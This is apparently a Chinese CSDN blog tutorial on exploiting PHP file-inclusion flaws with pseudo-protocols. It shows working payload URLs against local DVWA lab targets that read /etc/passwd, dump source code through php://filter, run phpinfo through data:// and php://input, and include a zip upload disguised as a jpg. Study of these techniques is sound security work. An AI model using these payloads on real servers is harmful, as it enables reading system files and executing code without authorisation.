文件包含-伪协议

最新推荐文章于 2024-06-22 21:50:04 发布
最新推荐文章于 2024-06-22 21:50:04 发布
阅读量8.8k 收藏 44
点赞数 12
分类专栏: 文件上传与文件包含
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wu000999/article/details/101925271
版权

文件包含漏洞利用的前提

1.web 应用采用 include 等文件包含函数,并且需要包含的文件路径是通过用户传输参数的方式引入;
2.用户能够控制包含文件的参数,被包含的文件可被当前页面访问;

在使用文件包含漏洞时,必须要能知道其绝对路径
方法: 在包含文件处,查看其返回的错误的信息

伪协议文件包含

file://		访问本地文件系统
http://		访问 HTTPs 网址
ftp://		访问 ftp URL 
Php://		访问输入输出流
Zlib://		压缩流
Data://		数据
Ssh2://		security shell2 
Expect://		处理交互式的流
Glob://		查找匹配的文件路径

伪协议后文件必须是绝对路径

file
条件:allow_url_fopen: off/on allow_url_include: off/on

Linux	:http://127.0.0.1/FI/LFI.php?file=file:///etc/passwd		绝对路径
Windows	:http://192.168.6.128:8001/vulnerabilities/fi/?page=file:///C:\DVWA-master\vulnerabilities\fi\1.txt		绝对路径

php

php://伪协议,主要为php://input与php://filter
php://input:将POST输入流当做PHP代码执行。其只受   allow_url_include参数的影响,allow_url_fopen开关与此伪协议无关。

php://filter伪协议:不受   allow_url_fopen与allow_url_include参数的影响

http://192.168.6.128:8001/vulnerabilities/fi/?page=php://filter/resource=./1.txt		相对路径
http://192.168.6.128:8001/vulnerabilities/fi/?page=php://filter/resource=file:///C:\DVWA-master\vulnerabilities\fi\1.txt		绝对路径
http://127.0.0.1/FI/LFI.php?file=php://filter/resource=file:///etc/passwd

此协议主要用于读取php源代码时会用到
http://192.168.6.128:8001/vulnerabilities/fi/?page=php://filter/read=convert.base64-encode/resource=./1.txt			以base64编码将文件内容输出

zip

条件:allow_url_fopen: off/on 		allow_url_include: off/on
	1 、现将要执行 php 代码写好并且命名为 a.txt,将 a.txt 进行 zip 压缩,命名为 a.zip,如果可以上传 zip 文件便直接上传,如若不能可将 a.zip 命名为 a.jpg 上传;
	2 、将 a.php 直接压缩成 a.bz2

http://127.0.0.1/LFI.php?file=zip://D:/phpstudy/PHPTutorial/WWW/a.zip%23a.txt 
http://127.0.0.1/FI/LFI.php?file=zip://D:/phpstudy/PHPTutorial/WWW/a.jpg%23a.txt

phar

条件:allow_url_fopen: off/on 		allow_url_include: off/on	 php 版本大于等于php5.3.0

data

allow_url_fopen: on 			allow_url_include: on

http://192.168.6.128:8001/vulnerabilities/fi/?page=data://test/plain,<?php phpinfo();?>
http://192.168.6.128:8001/vulnerabilities/fi/?page=data://test/plain;base64,PD9waHAgcGhwaW5mbygpPz4=

input

条件:allow_url_fopen:off/on allow_url_include:on

http://127.0.0.1/LFI.php?file=php://input	
	用post方式提交这个数据 <?php phpinfo()?>

http

allow_url_fopen与allow_url_include同时开启。缺一不可

http://localhost/test.php?file=http://www.baidu.com
孤君
关注
  • 12
    点赞
  • 44
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
第十三天 文件包含漏洞
weixin_46653764的博客
06-19 220
一、先了解include、require、include_once、require_once include (或 require)语句会获取指定文件中存在的所有文本/代码/标记,并复制到使用 include 语句的文件中。 include 和 require 语句是相同的,除了错误处理方面: (1)require 会生成致命错误(E_COMPILE_ERROR)并停止脚本 (2)include 只生成警告(E_WARNING),并且脚本会继续 语法: include 'filename’ 比如现在有一个f
CTF学习笔记——Include&Ping Ping Ping
Obs_cure的博客
09-20 1537
一、[ACTF2020 新生赛]Include 1.题目 2.解题步骤 点进去看了一下 根据题目猜测,应该是和php的文件包含漏洞有关…尝试了一下显示phpinfo,意料之中的失败了,看wp才了解到,这是一道伪协议的题目。然后翻了一下之前的博客,复制一下payload,成功解题。 ?file=php://filter/convert.base64-encode/resource=flag.php 3.总结 第二次做伪协议的题,只能说经验不足,辨识出来,下次遇见类似这种访问文件的题目时可以尝试。
python的入门7
LDandZJY的博客
06-06 67
定义:如果在一个内部函数里,对在外部作用域(但不是在全局作用域)的变量进行引用,那么内部函数就被认为是闭包(closure).结合这段简单的代码和定义来说明闭包:如果在一个内部函数里:funY(y)就是这个内部函数,对在外部作用域(但不是在全局作用域)的变量进行引用:x就是被引用的变量,x在外部作用域funX里面,但不在全局作用域里,则这个内部函数funY就是一个闭包。
WEB安全之文件包含漏洞(2)
最新发布
2301_81685556的博客
06-22 591
日志文件是用于记录系统操作事件的记录文件或文件集合,可分为事件日志和消息日志。具有处理历史数据、诊断问题的追踪以及理解系统的活动等重要作用。
【每天学习一点新知识】文件包含常用之伪协议
RexHa的博客
02-06 3640
一些比较常用的php伪协议用法及部分演示过程
网安入门15-文件包含伪协议总结)
m0_61499194的博客
01-12 1135
php:// 可用于以下目的: 1. 读取来自用户输入的数据 2. 写入数据到客户端浏览器 3. 记录错误信息
[ACTF2020 新生赛]Include
qq_45237160的博客
01-06 230
利用filter协议读文件±,将index.php通过base64编码后进行输出。这样做的好处就是如果不进行编码,文件包含后就不会有输出结果,而是当做php文件执行了,而通过编码后则可以读取文件源码。当它与包含函数结合时,php://filter流会被当作php文件执行。从而导致 任意文件读取。查看tips和flag.php页面源代码,并没有发现什么,只是一些简单的html代码,此时想到应该去获取php文件源代码。简单通俗的说,这是一个中间件,在读入或写入数据的时候对数据进行处理后输出的一个过程。
管理系统系列--伪分布式电子档案管理系统.zip
02-26
但根据标题和描述,我们可以推测该系统可能涉及的技术包括:电子档案标准(如EAD或MARC)、数据库管理(如关系型数据库或NoSQL数据库)、网络通信协议(如HTTP或TCP/IP)、文件系统接口、以及可能的编程语言(如Java...
文件下载包伪代码,可以解决部分问题
07-21
综上所述,“文件下载包伪代码”涉及的主要是Web前端如何实现文件下载,包括各种API的使用、浏览器兼容性处理以及应对各种场景的策略。通过理解这些知识点,开发者可以更有效地实现在Web应用中进行文件下载的功能。
j7ur8#WebBook#伪协议文件包含1
07-25
伪协议参考利用条件filter的过滤器有很多。
ios-伪微信.zip
07-11
"ios-伪微信.zip"这个压缩包文件的内容看起来是一个针对iOS平台的仿微信应用,名为"WeCat"。从标签“文本输入”我们可以推测,这个项目可能着重于实现类似微信的文本交流功能。在这个仿制应用中,用户可以发送文本...
php伪协议.zipphp伪协议.zip
02-24
在提到的“php伪协议.docx”文件中,可能包含了更详细的关于PHP伪协议的使用示例、历史背景,以及如何在受限环境中安全地使用这些机制的信息。这个文档可能涵盖了如何在不违反安全策略的情况下,利用PHP伪协议来实现...
ctf 命令执行总结
njqfb的博客
06-04 2779
命令执行绕过总结 linux系统查看文件命令 more 一页一页的显示文件内容 less 和more类似 head 只显示头几行 tail 只显示最后几行 nl 显示时还输出行号 tailf cat 由第一行开始显示内容,并将所有内容输出 tac 从最后一行倒序显示内容,并将所有内容输出 od 以二进制的方式读取内容 vi 编辑文件 vim 编辑文件,是vi的升级版 sort 将以默认的方式将文本文件的第一列以ASCI
配合php伪协议利用文件包含漏洞
超人学飞的日子
06-06 9204
php支持多种封装协议,这些协议常被CTF出题中与文件包含漏洞结合,这里做个小总结。实验用的是DVWA平台,low级别,phpstudy中的设置为5.4.45版本,设置allow_url_fopen和allow_url_include都为On.index.phpindex.php同级目录下有mytest001.txt ,mytest002.txt ,mytest003.zip(其中包含mytest...
iwebsec靶场 文件包含漏洞通关笔记9-file://伪协议利用
mooyuan的博客
09-14 376
file协议也叫本地文件传输协议 ,主要用于访问本地计算机中的文件,就如同在Windows资源管理器中打开文件或者通过右键单击‘打开’一样。基本的格式:file:///文件路径。
Java Web之过滤器(Filter)
热门推荐
喻志强的博客
07-31 21万+
过滤器(Filter) 过滤器实际上就是对web资源进行拦截,做一些处理后再交给servlet。 通常都是用来拦截request进行处理的,也可以对返回的response进行拦截处理 大概流程图如下 应用场景 自动登录 统一设置编码格式 访问权限控制 敏感字符过滤等...
php文件包含+伪协议+文件上传漏洞利用实例
Q1n6
07-12 1万+
1.上传文件过滤了后缀名和MIME类型,$_FILES['pic']['type']是由浏览器传输的文件类型决定,但是mime_content_type()是由php 内置方法判断文件类型;         支持文件类型为application/zip,支持上传zip压缩文件,后缀名还是要改成.jpg或.gif,上传后将该名为随机数字(1499394959).jpg格式 $name1=sub
CTF中遇见的PHP伪协议运用
byxs007的博客
12-15 1万+
关于PHP伪协议中的总结网上已经有很多文章了 LoRexxar的PHP伪协议总结 PHP伪协议 官方文档 以下都是在做CTF题目的时候遇见的一些知识点,每遇到一点就会在这面做一些总结 php://input php://input 是个可以访问请求的原始数据的只读流。因为它不依赖于特定的 php.ini 指令。 注:enctype=”multipart/form-d
CTF-WEB-文件包含
2301_79721580的博客
11-08 271
最近跟着大师傅的课程学习着ctf中web,随想记录下知识点,便于日后的复习,难免会有错误,望师傅们能多加指点,今天进入文件包含的学习。1.文件包含的本质1>代码复用2>并行开发3>模块化4>增加移植性2.include和eval的异同同:都不是函数,都是语言结构,无法通过配置文件函数禁用来禁用。异:include:后面接一个路径表示执行php文件的路径,读取路径中文件中内容后,然后执行里面的php代码eval:后面接php代码,表示要执行的php代码3.php常见文件包含函数、语言结构。
文件包含-伪协议filter
08-22
伪协议filter是一种用于文件包含伪协议。它不受allow_url_fopen和allow_url_include参数的影响,可以用来读取本地文件系统或访问HTTP、FTP等协议的URL。 在PHP中,可以使用php://filter伪协议来读取文件内容并对其进行处理。例如,使用php://filter/resource=来读取文件内容,php://filter/read=convert.base64-encode/resource=可以将文件内容以base64编码输出。 通过使用filter伪协议,攻击者可以利用文件包含漏洞来读取敏感文件,包括PHP源代码、配置文件等。因此,在编写PHP代码时,务必要注意对用户输入进行严格过滤和验证,避免文件包含漏洞的利用。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [文件包含-伪协议](https://blog.csdn.net/Wu000999/article/details/101925271)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* [CTF---Web---文件包含---02---rot13伪协议](https://blog.csdn.net/qq_22160557/article/details/119174803)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值